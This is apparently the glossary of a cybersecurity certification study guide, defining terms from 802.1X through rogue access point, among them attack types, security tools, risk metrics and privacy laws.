Glossary of Key Terms

Numerics

802.1X A standard that defines a framework for centralized port-based authentication.

A

acceptable use policy (AUP) A policy that is used to inform users of the actions that are allowed and those that are not allowed.

Attack Complexity (AC) CVSS base metric that describes the difficulty of exploiting the vulnerability.

Attack Vector (AV) CVSS base metric that describes how the attacker would exploit the vulnerability.

accreditation Occurs when the adequacy of a system’s overall security is accepted by management.

accuracy A description of the correctness of the data.

active defense Process of aligning your incident identification and incident response processes such that there is an element of automation built into your reaction to any specific issue.

Active Directory (AD) Microsoft implementation of SSO. See also single sign-on (SSO).

active enumeration The technique of sending packets of some sort to the network and then assessing responses.

active vulnerability scanner A type of scanner that can take action to block an attack, such as block a dangerous IP address.

Advanced Access Content System (AACS) Protects Blu-ray and HD DVD content. Hackers have been able to obtain the encryption keys to this system.

advanced persistent threat (APT) Threat from a highly organized attacker with significant resources that is carried out over a long period of time.

Adversary Corner of the Diamond model that describes the intent of the attack.

aggregation The process of assembling or compiling units of information at one sensitivity level and having the resultant totality of data being of a higher sensitivity level than the individual components.

air gap A device with no network connections and all access to the system must be done manually by adding and removing items with a flash drive or other external device.

Aircrack-ng A set of command-line tools for sniffing and attacking wireless networks.

analysis The step in the intelligence cycle where data is combed and analyzed to identify relevant pieces of information.

annual loss expectancy (ALE) The expected risk factor of an annual threat event. Calculated as the single loss expectancy (SLE) times the annualize rate of occurrence (ARO).

annualized rate of occurrence (ARO) The estimate of how often a given threat might occur annually.

anti-tamper technology Designed to prevent access to sensitive information and encryption keys on a device.

Application log Log that focuses on the operation of Windows applications. Events in this log are classified as error, warning, or information, depending on the severity of the event.

application programming interface (API) integration The applications on either end of the API are synchronized and protecting the integrity of the information that passes through the API. It also enables the proper updating and versioning required in many environments.

application wrapping Technique to protect mobile devices and the data they contain. Application wrappers (implemented as policies) enable administrators to set policies that allow employees with mobile devices to safely download an app, typically from an internal store.

Arachni A Ruby framework for assessing the security of a web application.

asset criticality A measure of how essential an asset is to the organization’s business.

asset tagging Process of placing physical identification numbers of some sort on all assets.

asset value (AV) Value of an asset. Multiplied by the exposure factor (EF) to calculate single loss expectancy (SLE).

asymmetric algorithms Algorithms that use both a public key and a private or secret key. The public key is known by all parties, and the private key is known only by its owner.

atomic execution A set of instructions either execute in order and in entirety or the changes they make are rolled back or prevented Atomic operations in concurrent programming are program operations that run independently of any other processes (threads). Making the operation atomic consists of using synchronization mechanisms in order to make sure that the operation is seen, from any other thread, as a single, atomic operation. This increases security by preventing one thread from viewing the state of the data when the first thread is still in the middle of the operation.

attack frameworks Frameworks and methodologies that include security program development standards, enterprise and security architect development frameworks, security control development methods, corporate governance methods, and process management methods.

attack vector A segment of the communication path that an attack uses to access a vulnerability.

attestation Process in which the software and platform components have been identified, or “measured,” using cryptographic techniques.

attribute-based access control (ABAC) Authentication system that grants or denies user requests based on arbitrary attributes of the user and arbitrary attributes of the object, and environment conditions that may be globally recognized.

Authentication (Au) CVSS base metric that describes the authentication an attacker would need to get through to exploit the vulnerability.

Authentication Header (AH) IPsec component that provides data integrity, data origin authentication, and protection from replay attacks.

authentication period How long a user can remain logged in.

authentication server In the 802.1X framework, the centralized device that performs authentication.

authenticator In the 802.1X framework, the device through which the supplicant is attempting to access the network.

automated malware signature creation A method of identifying malware in which the AV software monitors incoming unknown files for the presence of malware and analyzes the file based on both classifiers of file behavior and classifiers of file content.

Availability (A) CVSS base metric that describes the disruption that might occur if the vulnerability is exploited.

B

backdoor/trapdoor A mechanism implemented in many devices or applications that gives the user who uses the backdoor unlimited access to the device or application.

BACnet protocol An application, network, and media access control (MAC) layer communications service. It can operate over a number of Layer 2 protocols, including Ethernet.

Basel II International accord that addresses minimum capital requirements, supervisory review, and market discipline of financial institutions.

bash A scripting language that is used to work in the Linux interface.

bastion host Device exposed directly to the Internet or to any untrusted network while screening the rest of the network from exposure.

beaconing Traffic that leaves a network at regular intervals.

big data Sets of data so large or complex that they cannot be analyzed by using traditional data processing applications.

blacklisting The process of identifying and blocking as bad senders a list of unacceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier. Occurs when a list of unacceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier is configured as bad senders or as not allowed to send while allowing all others. See also whitelisting.

blocks cipher Cipher that performs encryption by breaking the message into fixed-length units.

blue team A group of technicians who acts as the network defense team during testing.

botnet A type of malware that after it’s installed, the bot has the ability to connect back to the hacker’s computer. After that, his server controls all the bots located on these machines.

bring your own device (BYOD) policy Policy designed to allow personal devices in the network.

buffer overflow An attack that occurs when the amount of data that is submitted is larger than the buffer can handle.

Burp Suite A suite of tools used for testing web applications.

bus encryption Protects the data traversing hardware buses.

Business Continuity Planning (BCP) committee Performs vulnerability analysis and risk assessment.

business impact analysis (BIA) Lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization.

C

Cain and Abel A well-known password cracking program.

call list/escalation list A list of contact information for all individuals, such as first responders, who might need to be alerted during the investigation of an incident.

Capability Corner of the Diamond model that describes the attacker intrusion tools and techniques.

Capability Maturity Model Integration (CMMI) A comprehensive set of guidelines that address all phases of the software development life cycle (SDLC).

carving Forensic technique used to identify a file when only fragments of data are available and no file system metadata is available.

Cellebrite A forensic tool that focuses on collecting evidence from smartphones.

certificate revocation list (CRL) A list of expired and revoked certificates.

certification Evaluates the technical system components.

certificate authority (CA) The entity in a PKI that creates and signs digital certificates, maintains the certificates, and revokes them when necessary

change management Formal process for managing change.

characteristic factor authentication Authentication based on something the person is.

clearing Removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools.

click-jacking An attack that crafts a transparent page or frame over a legitimate-looking page that entices the user to click something.

cloud access security broker (CASB) A software layer that operates as a gatekeeper between an organization’s on-premises network and the provider’s cloud environment.

COBIT Security controls development framework that uses a process model to subdivide IT into four domains.

code of conduct/ethics Details standards of business conduct.

cognitive password A type of password that is a piece of information that can be used to verify an individual’s identity.

collection The step in the intelligence cycle where data searching and organizing occurs.

combination password A type of password that uses a mix of dictionary words, usually two that are unrelated.

commodity malware Malware that is widely available for either purchase or by free download. It is not customized or tailored to a specific attack.

Common Configuration Enumeration (CCE) SCAP component; configuration best practice statements maintained by the National Institute of Standards and Technology (NIST).

Common Platform Enumeration (CPE) SCAP component; a NIST standardized method of describing methods for describing and classifying operating systems, applications, and hardware devices.

Common Vulnerabilities and Exposures (CVE) SCAP component; list of vulnerabilities in published operating systems and applications software.

Common Vulnerability Scoring System (CVSS) A system of ranking vulnerabilities that are discovered based on pre-defined metrics.

Common Weakness Enumeration (CWE) SCAP component; an identification scheme for design flaws in the development of software that can lead to vulnerabilities.

Communications Assistance for Law Enforcement Act (CALEA) of 1994 Requires telecommunications carriers and manufacturers of telecommunications equipment to modify and design their equipment, facilities, and services to ensure that they have built-in surveillance capabilities.

community cloud A cloud deployment model in which the cloud infrastructure is shared among several organizations from a specific group with common computing needs.

compensating control A type of control that is applied to mitigate the impact or likelihood of an attack; also called a countermeasure.

complex password A type of password that includes a mixture of upper- and lowercase letters, numbers, and special characters.

Computer Fraud and Abuse Act (CFAA) Affects any entities that engage in hacking of “protected computers,” as defined in the act.

Computer Security Act of 1987 The first law to require a formal computer security plan. It was written to protect and defend the sensitive information in the federal government systems. Superseded in 2002 by the Federal Information Security Management Act (FISMA).

confidence level In the context of intelligence sources, a description of the perceived integrity of any particular data.

Confidentiality (C) CVSS base metric that describes the information disclosure that may occur if the vulnerability is exploited.

configuration baseline A floor or minimum standard that is required.

configuration lockdown Prevents any changes to the configuration of a device, even by users who formerly had the right to configure the device.

containerization Server virtualization technique in which the kernel allows for multiple isolated user space instances.

contamination Intermingling or mixing of data of one sensitivity or need-to-know level with that of another.

Content Scrambling System (CSS) Uses encryption to enforce playback and region restrictions on DVDs.

continuous deployment/delivery Attempts to make sure that you can release new changes to your customers quickly in a sustainable way. Continuous deployment goes one step further with every change that passes all stages of your production pipeline being released to your customers.

continuous integration Software development practice whereby the work of multiple individuals is combined a number of times a day.

control plane Network architecture plane that carries signaling traffic originating from or destined for a router. This is the information that enables routers to share information and build routing tables.

Controller Area Network (CAN bus) Designed to allow vehicle microcontrollers and devices to communicate with each other’s applications without a host computer.

copyright Legal protection that ensures that a work that is authored is protected from any form of reproduction or use without the consent of the copyright holder.

corporate-owned, personally enabled (COPE) A strategy in which an organization purchases mobile devices and users manage those devices.

corrective control A type of control put into place to reduce the effect of an attack or other undesirable event.

cracker An individual who attempts to break into secure systems without using the knowledge gained for any nefarious purposes.

credential stuffing Entering a large number of spilled credentials automatically into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes.

credentialed scan A scan performed with administrator access.

criticality A measure of the importance of the data.

cross-site request forgery (CSRF) An attack that exploits the website’s trust of the browser. The website thinks that the request came from the user’s browser and was actually made by the user.

cross-site scripting (XSS) An attack that occurs when an attacker locates a website vulnerability and injects malicious code into the web application.

cryptoperiod The time span during which a specific key is authorized for use by legitimate entities, or the time that the keys for a given system will remain in effect.

D

data correlation The process of locating variables in the information that seem to be related.

data enrichment A technique that allows one process to gather information from another process or source and then customize a response using the data from the second process or source.

data exfiltration The theft of data from a device or network.

data loss prevention (DLP) Software that attempts to prevent data leakage.

data masking Altering data from its original state to protect it.

data plane Network architecture plane that carries user traffic; also known as the forwarding plane.

data sovereignty The concept that data stored in digital format is subject to the laws of the country in which the data is located.

DataProtection API (DPAPI) API that lets you encrypt data using the user’s login credentials.

dd A Linux command that is used is to convert and copy files.

debugging A process that steps though the code interactively.

decompiling A process that attempts to reconstruct high-level language source code.

decomposition The process of breaking down software to discover how it works, perhaps who created it, and, in some cases, how to prevent the software from performing malicious activity.

deidentification The process of deleting or masking personal identifiers, such as personal name from a set of data

demilitarized zone (DMZ) A network logically separate from the intranet where resources that will be accessed from the outside world are made available to unauthenticated users.

denial-of-service (DoS) attack An attack in which attackers flood a device with enough requests to degrade the performance of the targeted device.

dereference Occurs when a pointer with a value of NULL is used as though it pointed to a valid memory area.

destruction The destroying of the media on which data resides.

detective control A type of control that is in place to detect an attack while it is occurring.

deterrent control A type of control that deters or discourages an attacker.

DevSecOps A development concept that grew out of the DevOps approach to software development that’s emphasizes security in all phases.

DHCP snooping Used to prevent a poisoning attack on the DHCP database.

Diamond Model of Intrusion Analysis Intrusion analysis model that emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims.

digital rights management (DRM) Used to control the use of digital content.

digital signature A hash value encrypted with the sender’s private key.

digital watermarking Involves embedding a logo or trademark in documents, pictures, or other objects.

directive control A type of control that specifies acceptable practice within an organization.

directory traversal One of the ways malicious individuals are able to access parts of a directory to which they should not have access.

disassembly Reading the machine code into memory and then outputting each instruction as a text string.

dissemination The step in the intelligence cycle where information is shared with those responsible for designing security controls to address issues.

DNP3 A master/slave protocol used in building automation that uses port 19999 when using Transport Layer Security (TLS) and port 20000 when not using TLS.

DOM XSS XSS attack in which the entire tainted data flow from source to sink takes place in the browser. The source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser.

domain bridging Using as a hotspot a device that has been made a member of the domain, allowing access to the organizational network to anyone using the hotspot.

domain generation algorithm (DGA) Algorithm that is used by attackers to periodically generate large numbers of domain names that can be used as rendezvous points with their command and control servers.

Domain-based Message Authentication Reporting, and Conformance (DMARC) An e-mail authentication and reporting protocol that improves e-mail security within federal agencies.

DomainKeys Identified Mail (DKIM) Allows e-mail source verification by providing a method for validating a domain name identity that is associated with a message through cryptographic authentication.

dual-homed firewall A type of firewall with two interfaces, one pointing to the internal network and another connected to the untrusted network.

dynamic analysis Software code analysis done with the code executing.

Dynamic ARP Inspection (DAI) A security feature that intercepts all ARP requests and responses and compares each response’s MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table.

E

Economic Espionage Act of 1996 Affects companies that have trade secrets and any individuals who plan to use encryption technology for criminal activities.

eFuse allows for the dynamic real-time reprogramming of computer chips.

Electronic Communications Privacy Act (ECPA) of 1986 Affects law enforcement and intelligence agencies; extended government restrictions on wiretaps from telephone calls to include transmissions of electronic data by computer and prohibited access to stored electronic communications.

e-mail signature block A set of information such as name, e-mail address, company title, and credentials that usually appears at the end of an e-mail.

emanations Electromagnetic signals that are emitted by an electronic device.

embedded link A link embedded in one website that leads to another site.

embedded system A piece of software built into a larger piece of software that is in charge of performing some specific function on behalf of the larger system.

employee privacy issues and expectation of privacy Concept that organizations must give employees the proper notice of any monitoring that might be used.

Encapsulating Security Payload (ESP) IPsec component that provides all that AH does as well as data confidentiality.

EnCase Forensic A case (incident) management tool that offers built-in templates for specific types of investigations.

endpoint detection and response (EDR) A proactive endpoint security approach designed to supplement existing defenses.

enumeration The process of discovering what is in the network along with any other pieces of information that might be helpful in a network attack or compromise.

EU Electronic Security Directive Defines electronic signature principles.

EU Data Protection Directive Provides direction on how to follow the laws set forth in the principles.

executable process analysis Determines what process is using/taxing the CPU.

exposure factor (EF) The percentage value or functionality of an asset that will be lost when a threat event occurs.

Extensible Access Control Markup Language (XACML) A standard for an access control policy language using XML.

Extensible Markup Language (XML) attack An attack that targets the use of XML in a website. In one example, it compromises the application that parses or reads and interprets the XML. If the XML input contains a reference to an external entity and is processed by a weakly configured XML parser, it can lead to the disclosure of confidential data, denial of service, server-side request forgery, and port scanning. This is called an XML external entity attack.

external scan A vulnerability scan performed from outside the organization’s network to assess the likelihood of an external attack.

extranet A network logically separate from the intranet where resources that will be accessed from the outside world are made available to authenticated users.

F

false negative Occurs when a scanner does not identity a vulnerability that actually exists.

false positive Occurs when a scanner identifies a vulnerability that does not exist.

FATKit A memory forensics tool that automates the process of extracting interesting data from volatile memory.

fault tolerance Provided when a backup component begins operation when the primary component fails.

Federal Information Security Management Act (FISMA) of 2002 Requires all federal agencies to develop, document, and implement an agencywide information security program.

Federal Intelligence Surveillance Act (FISA) of 1978 The first act to give procedures for the physical and electronic surveillance and collection of “foreign intelligence information” between “foreign powers” and “agents of foreign powers” and applied only to traffic within the United States. It was amended by the USA PATRIOT Act of 2001 and the FISA Amendments Act of 2008.

Federal Privacy Act of 1974 Provides guidelines on collection, maintenance, use, and dissemination of PII about individuals that is maintained in systems of records by federal agencies.

field programmable gate array (FPGA) A type of programmable logic device (PLD) that is programmed by blowing fuse connections on the chip or using an antifuse that makes a connection when a high voltage is applied to the junction. A PLD is an integrated circuit with connections or internal logic gates that can be changed through a programming process.

FIN scan Type of scan that sets the FIN bit only.

firewall Device or software whose purpose is to inspect and control the type of traffic allowed.

flow analysis Type of analysis that focuses on ensuring that confidential and private information is isolated from other information.

forensic investigation suite A collection of tools that are commonly used in digital forensic investigations.

Forensic Toolkit (FTK) A commercial toolkit that can scan a hard drive for all sorts of information.

formal method Method of software analysis that follows prescribed procedures.

forwarding Routing e-mail through another organization’s e-mail system.

framework A methodology designed to help guide security professionals.

Function as a Service (FaaS) An extension of Platform as a Service (PaaS) that goes further and completely abstracts the virtual server from the developers. Charges are based not on server instance sizes but on consumption and executions.

fuzzing Injecting invalid or unexpected input (sometimes called faults) into an application to test how the application reacts,

G

geofencing The application of geographic limits to where a device can be used.

geotagging The process of adding geographical identification metadata to various media.

Gramm-Leach-Bliley Act (GLBA) of 1999 Affects all financial institutions, including banks, loan companies, insurance companies, investment companies, and credit card providers.

graphical password A type of password that uses graphics as part of the authentication mechanism; also called CAPTCHA password.

H

hacker An individual who attempts to break into secure systems to obtain knowledge about the systems and possibly use that knowledge to carry out pranks or commit crimes.

hardening Removing unnecessary functions to reduce the attack surface.

hardware security module (HSM) An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing.

hashing The process of using a hashing algorithm to reduce a large document or file to a character string that can be used to verify the integrity of the file.

Health Care and Education Reconciliation Act of 2010 Affects healthcare and educational organizations. This act increased some of the security measures that must be taken to protect healthcare information.

heap overflow A buffer overflow that occurs in the heap data area. Heap overflows are exploitable in a different manner to that of stack-based overflows.

Helix A live CD with which you can acquire evidence and make drive images without affecting the data on the host.

heuristics Analysis that determines the susceptibility of a system to a particular threat/risk using decision rules or weighing methods.

HIPAA Breach Notification Rule Requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information (PHI).

honeypot A system that is configured to be attractive to hackers and to lure them into spending time attacking it while information is gathered about the attack.

host scanning A process that involves identifying the live hosts on a network or in a domain namespace.

host-based firewall A type of firewall that resides on a single host and is designed to protect that host only.

hunt teaming A proactive threat hunting tactic in which a team works together to detect, identify, and understand advanced and determined threat actors. It is a new proactive approach to security that is offensive in nature rather than defensive, which has been common for security teams in the past.

hybrid cloud A cloud deployment model in which an organization provides and manages some resources in-house and has others provided externally via a public cloud.

I

imaging Creating a bit-level image of the disk.

impact analysis Analysis that determines impact of the event.

impersonation Sending e-mail that appears to come from someone else.

incident command system (ICS) Designed to provide a way to enable effective and efficient domestic incident management by integrating a combination of facilities, equipment, personnel, procedures, and communications operating within a common organizational structure.

incident form A form that is used to describe the incident in detail.

incident response A formal process or set of procedures for responding to cybersecurity incidents.

incident summary report A document that summarizes the incident.

indicator management Process of collecting and analyzing indicators of compromise (IOCs).

indicator of compromise (IOC) Any activity, artifact, or log entry that is typically associated with an attack of some sort.

inference Occurs when someone has access to information at one level that allows her to infer information about another level.

Infrastructure Corner of the Diamond model that describes the set of systems an attacker uses to launch attacks.

Infrastructure as a Service (IaaS) Cloud service model in which the vendor provides the hardware platform or data center, and the company installs and manages its own operating systems and application systems.

infrastructure as code (IaC) Manages and provisions computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools.

input validation The process of checking all input for issues such as proper format and proper length.

insecure object reference A process that occurs when a user has permission to use an application but is accessing information to which she should not have access.

integer overflow Occurs when math operations try to create a numeric value that is too large for the available space.

integrated intelligence The consideration and analysis of intelligence data from a perspective that combines multiple data sources and attempts to make inferences based on this data integration.

Integrity (I) CVSS base metric that describes the type of data alteration that might occur.

intellectual property A tangible or intangible asset to which the owner has exclusive rights.

internal scan A vulnerability scan performed from inside the organization’s network to assess the likelihood of an insider attack.

Internet Key Exchange (IKE) An IPsec component that provides the authentication material used to create the keys exchanged by ISAKMP during peer authentication.

Internet of Things (IoT) Refers to a system of interrelated computing devices, mechanical and digital machines, and objects that are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

Internet Security Association and Key Management Protocol (ISAKMP) An IPsec component that handles the creation of a security association for the session and the exchange of keys.

intrusion detection system (IDS) A system that creates a log of every security event that occurs.

intrusion prevention system (IPS) A system that takes action when a security event occurs.

Internet Protocol Security (IPsec) A suite of protocols used to create an encrypted connection.

ISO/IEC 27000 Series A family of security program development standards providing guidance on how to develop and maintain an information security management system (ISMS).

ISO/IEC 27001:2013 The latest version of the 27001 standard, one of the most popular standards by which organizations obtain certification for information security. It provides guidance on ensuring that an organization’s information security management system (ISMS) is properly built, established, maintained, and continually improved.

isolation/sandboxing Placing malware where it can be safely probed and analyzed.

ITIL A process management development standard developed by the Office of Management and Budget in OMB Circular A-130.

J

John the Ripper Password cracker that can work in Unix/Linux as well as macOS.

jumpbox A server that is used to access devices that have been placed in a secure network zone such as a DMZ.

K

kernel debugger A debugger that operates at ring 0.

key escrow The process of storing keys with a third party to ensure that decryption can occur.

key stretching Cryptographic technique that involves making a weak key stronger by increasing the time it takes to test each possible key.

kill chain A model that describes the stages of an intrusion.

knowledge factor authentication Authentication based on something committed to memory.

known threats Threats of which we are aware.

KnTTools A memory acquisition and analysis tool used with Windows systems.

L

Layer 2 Tunneling Protocol (L2TP) Protocol that operates at Layer 2 of the OSI model. Like PPTP, L2TP can use various authentication mechanisms; however, L2TP does not provide any encryption. It is typically used with IPsec.

legacy systems Older systems that may be less secure than newer systems.

legal hold A legal requirement placed on an organization to maintain archived data for longer periods for legal proceedings.

lessons learned report Lists and discusses what was learned about how and why the incident occurred and how to prevent it from occurring again.

logic bomb Type of malware that executes when a particular event takes place.

LonWorks/LonTalk3 Peer-to-peer protocol used in building automation; uses port 1679.

M

machine learning Capability of software to gather information and make conclusions.

maintenance hook A backdoor account created by programmers to give someone full permissions in a particular application or operating system.

management plane Network architecture plane that administers the router.

managerial control A type of control that is implemented to administer the organization’s assets and personnel and includes security policies, procedures, standards, baselines, and guidelines that are established by management.

mandatory access control (MAC) Authentication system in which authorization is based on security labels.

man-in-the-middle attack An attack that intercepts legitimate traffic between two entities.

mantrap A physical access control system that consists of a series of two doors with a small room between them. The user is authenticated at the first door and then allowed into the room. At that point, additional verification occurs.

maturity models Process models developed to help develop security skills.

maximum tolerable downtime (MTD) The maximum amount of time that an organization can tolerate a single resource or function being down.

mean time between failures (MTBF) The estimated amount of time a device will operate before a failure occurs.

mean time to repair (MTTR) The average time required to repair a single resource or function.

measured boot A term that applies to several technologies that follow the Secure Boot standard.

Memdump A free tool that runs on Windows, Linux, and Solaris that simply creates a bit-by-bit copy of the volatile memory on a system.

memorandum of understanding (MOU) Document that, while not legally binding, indicates a general agreement between the principals to do something together.

memory dumping Analyzing the entire memory content used by an application.

MicroSD HSM A hardware security module that connects to the microSD port on a device that has such a port.

microservices A variant of the service-oriented architecture (SOA) structural style that arranges an application as a collection of three loosely coupled services. The focus is on building single-function modules with well-defined interfaces and operations.

MITRE ATT&CK Knowledge base of adversary tactics and techniques based on real-world observations. It is an open system, and attack matrices are created for various industries.

mobile code Software that is transmitted across a network to be executed on a local system.

mobile device management (MDM) A system that is used to control mobile device settings, applications, and other parameters when those devices are attached to the enterprise.

Modbus A master/slave protocol used in building automation that uses port 50.

multifactor authentication (MFA) An authentication process that requires more than a single authentication factor.

multihomed firewall A type of firewall with three interfaces: one connected to the untrusted network, one connected to the internal network, and one connected to the DMZ.

N

near field communication (NFC) A short-range type of wireless transmission that is used in payment card such as Apple Pay and Google Pay.

Nessus Professional A proprietary network scanner developed by Tenable Network Security.

NetFlow A technology developed by Cisco that is supported by all major vendors and can be used to collect and subsequently export IP traffic accounting information.

network access control (NAC) A service that goes beyond authentication of the user and includes examination of the state of the computer the user is introducing to the network when making a remote-access or VPN connection to the network.

next-generation firewall (NGFW) A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering the performance.

Nikto A vulnerability scanner that is dedicated to web servers.

NIST Cybersecurity Framework A framework that focuses exclusively on IT security.

NIST SP 800-53 Rev 4 A security controls development framework that divides the controls into three classes: technical, operational, and management.

NIST SP 800-57 Contains recommendations for key management and is published in three parts.

NIST SP 800-128 Provides guidance on implementing endpoint protection platforms (EPPs).

Nmap A tool that can be used to scan for open ports and perform many other operations, including performing certain attacks.

Node.js A scripting language framework to write network applications using JavaScript.

non-credentialed scan A scan performed without administrator access.

null scan A scan that is series of TCP packets that contain a sequence number of 0 and no set flags.

numeric password A type of password that includes only numbers.

O

oclHashcat A general-purpose computing on graphics processing units (GPGPU)-based multi-hash cracker using a brute-force attack.

one-time password (OTP) A type of password that is used only once to log in to the access control system.

Online Certificate Status Protocol (OCSP) An Internet protocol that obtains the revocation status of an X.509 digital certificate.

OpenID An open standard and decentralized protocol by the nonprofit OpenID Foundation that allows users to be authenticated by certain cooperating sites.

OpenIOC An open framework, meant for sharing threat intelligence information in a machine-readable format.

open-source intelligence Intelligence sources that are available to all.

OpenVAS An open source scanner developed from the Nessus code base and is available as a package for many Linux distributions.

operational control A type of control that is part of the organizational security stance day to day.

organizational governance The process of controlling an organization’s activities, processes, and operations.

output encoding The process of changing data into another form using code. Applied to output to prevent the inclusion of dangerous character types that might be inserted by malicious individuals.

overflow attack Occurs when an area of memory of some sort is full and can hold no more information.

ownership factor authentication Authentication based on something in your possession.

P

packet analysis Analysis that examines an entire packet, including the payload.

Pacu An exploit framework used to assess and attack Amazon Web Services (AWS) cloud environments.

parameterized queries Queries that do not require input values or parameters.

passive enumeration The technique of capturing traffic and making educated assumptions from the traffic.

passive vulnerability scanner A type of scanner that cannot take action to block an attack, such as block a dangerous IP address.

passphrase password A type of password that uses a long phrase. Because of the password’s length, it is easier to remember but much harder to attack.

password complexity How the password will be structured.

password history How long before a password can be reused.

password length How long the password must be.

password life How long a password will be valid.

password spraying A technique used to identify the passwords of domain users. Rather than targeting a single account as in a brute-force attack, it targets or “sprays” multiple accounts with the same password attempt.

patching Applying updates that fix security or functional issues.

patent A right granted to an individual or a company to protect the rights to an invention.

Payment Card Industry Data Security Standard (PCI DSS) Standard that affects any organizations that handle cardholder information for the major credit card companies.

peer-to-peer botnet A botnet in which devices that can be reached externally are compromised and run server software that turns them into command and control servers for the devices that are recruited internally that cannot communicate with the command and control server operating externally.

Perl A scripting language found on all Linux servers. It helps in text manipulation tasks.

permissions Access rights granted or denied at the file, folder, or other object level.

persistent XSS An XSS attack in which the hacker stores the user input on the target server, such as in a database, in a message forum, a visitor log, a comment field, and so forth, and then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. Also called a stored or Type I attack.

personal health information (PHI) The medical records of individuals; also referred to as protected health information.

Personal Information Protection and Electronic Documents Act (PIPEDA) Affects how private-sector organizations collect, use, and disclose personal information in the course of commercial business in Canada.

personally identifiable information (PII) Any piece of data that can be used alone or with other information to identify a single person.

phishing A social engineering attack in which attackers try to learn personal information, including credit card information and financial data.

physical control A type of control that is implemented to protect an organization’s facilities and personnel.

ping sweep Uses ICMP to identify all live hosts by pinging all IP addresses in the known network.

piping The process of sending the output of one function to another function as its input.

Platform as a Service (PaaS) Cloud service model in which the vendor provides the hardware platform or data center and the software running on the platform, including the operating systems and infrastructure software.

Point-to-Point Tunneling Protocol (PPTP) Microsoft protocol based on PPP that uses built-in Microsoft Point-to-Point encryption and can use a number of authentication methods, including CHAP, MS-CHAP, and EAP-TLS.

policy decision point (PDP) An entity that retrieves all applicable polices in XACML and compares the request with the policies.

policy enforcement point (PEP) An entity that protects the resource that the subject (a user or an application) is attempting to access in XACML.

port scan A scan that attempts to connect to every port on each device and report which ports are open, or “listening.”

port security Allows you to keep a port enabled for legitimate devices while preventing its use by illegitimate devices.

preventive control A type of control that prevents an attack from occurring.

privacy Relates to rights to control the sharing and use of one’s personal information.

private cloud A cloud deployment model in which a private organization implements a cloud in its internal enterprise, and that cloud is used by the organization’s employees and partners.

Process Explorer A Sysinternals tool that enables you to look at the graph that appears in Task Manager and identify what caused spikes in the past, which is not possible with Task Manager alone.

processor security extensions A set of security-related instruction codes that are built into some modern central processing units (CPUs).

programmable logic controllers (PLCs) Industrial control system (ICS) components that connect to the sensors and convert sensor data to digital data; they do not include telemetry hardware.

proprietary systems solutions have been developed by the organization that do not follow standard.

proprietary/closed-source intelligence Intelligence sources that are available to only a select audience.

protocol analysis Analysis that examines information in the header of a packet.

Prowler A tool that creates reports that list gaps found between the best practices of AWS as stated in CIS Amazon Web Services Foundations Benchmark 1.1.

proximity reader A door control that reads a proximity card from a short distance and is used to control access to a sensitive room.

proxy Any device or application that acts as an intermediary for requests from clients seeking resources.

public cloud A cloud deployment model in which a service provider makes resources available to the public over the Internet.

public key infrastructure (PKI) A collection of systems, software, and communication protocols that distribute, manage, and control public key cryptography.

purging A data destruction technique that makes the data unreadable even with advanced forensic techniques.

push notification services Allow unsolicited messages to be sent by an application to a mobile device even when the application is not open on the device.

Python A scripting language that supports procedure-oriented programming and object-oriented programming.

Q

qualitative risk analysis Risk analysis that does not assign monetary and numeric values to all facets of the risk analysis process.

Qualys A cloud-based vulnerability scanner.

quantitative risk analysis Risk analysis that assigns monetary and numeric values to all facets of the risk analysis process, including asset value, threat frequency, vulnerability severity, impact, and safeguard costs.

query writing Search functions that help to locate the relevant information in log data.

R

race condition An attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome.

radio frequency identification (RFID) Object-tracking technology that uses radio frequency chips and readers to manage inventory

ransomware A type of malware that prevents or limits users from accessing their systems. It is called ransomware because it forces its victims to pay a ransom through certain online payment methods.

real user monitoring (RUM) A monitoring method that captures and analyzes every transaction of every application or website user.

real-time operating system (RTOS) A system designed to process data as it comes in, typically without buffer delays.

Reaver Both a package of tools called Reaver and a tool within the package called Reaver that is used to attack Wi-Fi Protected Setup (WPS).

recoverability The ability of a function or system to be recovered in the event of a disaster or disruptive event.

recovery point objective (RPO) The point in time to which the disrupted resource or function must be returned.

recovery time objective (RTO) The shortest time period after a disaster or disruptive event within which a resource or function must be restored in order to avoid unacceptable consequences.

red team A group of technicians who acts as the attacking force during testing.

reflective XSS XSS attack in which a web application immediately returns user input in an error message or search result, without that data being made safe to render in the browser, and without permanently storing the user provided data.

registration authority (RA) The entity in a PKI that verifies the requestor’s identity and registers the requestor.

relevancy A description of the applicability of the data to a particular threat.

remote code execution A category of attack types distinguished by the ability of the hacker to get the local system (user system) to execute code that resides on another machine, which could be located anywhere in the world.

remote terminal units (RTUs) Industrial control system (ICS) components that connect to the sensors and convert sensor data to digital data, including telemetry hardware.

remote wipe Instructions sent remotely to a mobile device that erase all the data, typically used when a device is lost or stolen.

Representational State Transfer (REST) A client/server model for interacting with content on remote systems, typically using HTTP.

Responder A tool that can be used for answering NBT and LLMNR name requests.

responsive control A type of control that is implemented after an event; also called a recovery control.

reverse engineering The process of taking something apart to discover how it works and perhaps to replicate it; retracing the steps in an incident, as seen from the logs.

RFID See radio frequency identification (RFID).

rights Manage who is allowed to perform certain operations on an entire computer or within a domain, rather than a particular object within a computer.

risk acceptance Understanding and accepting the level of risk as well as the cost of damages that can occur.

risk assessment A tool used in risk management to identify vulnerabilities and threats, assess the impact of those vulnerabilities and threats, and determine which controls to implement.

risk assessment matrix A table used to assess risks qualitatively.

risk avoidance Terminating an activity that causes a risk or choosing an alternative that is not as risky.

risk management A formal process that rates identified vulnerabilities by the likelihood of their compromise and the impact of said compromise.

risk mitigation Defining the acceptable risk level the organization can tolerate and reducing the risk to that level.

risk transfer Passing on the risk to a third party, such as an insurance company.

rogue access point An unauthorized AP connected to the organization’s wireless network that the organization does not control and manage.

